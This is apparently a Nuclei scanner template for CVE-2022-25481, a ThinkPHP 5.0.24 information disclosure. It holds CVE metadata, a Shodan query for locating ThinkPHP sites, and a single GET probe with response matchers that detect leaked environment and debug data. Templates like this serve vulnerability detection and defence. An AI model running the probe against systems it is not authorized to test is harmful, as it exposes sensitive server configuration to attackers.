48 lines
1.3 KiB
YAML
48 lines
1.3 KiB
YAML
id: CVE-2022-25481
|
|
|
|
info:
|
|
name: ThinkPHP 5.0.24 - Information Disclosure
|
|
author: caon
|
|
severity: high
|
|
description: |
|
|
ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
|
|
reference:
|
|
- https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25481
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2022-25481
|
|
cwe-id: CWE-668
|
|
epss-score: 0.00892
|
|
cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
verified: true
|
|
shodan-query: title:"ThinkPHP"
|
|
vendor: thinkphp
|
|
product: thinkphp
|
|
tags: cve,cve2022,thinkphp,exposure,oss
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/index.php?s=example'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Exception"
|
|
- "REQUEST_TIME"
|
|
- "ThinkPHP Constants"
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- 500
|
|
- 404
|
|
condition: or
|